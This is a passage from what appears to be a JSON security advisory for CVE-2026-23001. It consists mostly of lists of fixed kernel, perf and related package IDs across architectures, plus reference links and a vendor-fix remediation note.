"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-23001"
},
{
"category": "external",
"summary": "RHBZ#2432664",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2432664"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23001",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23001"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2026012534-CVE-2026-23001-7ab0@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2026012534-CVE-2026-23001-7ab0@gregkh/T"
}
],
"release_date": "2026-01-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-09T10:02:53+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
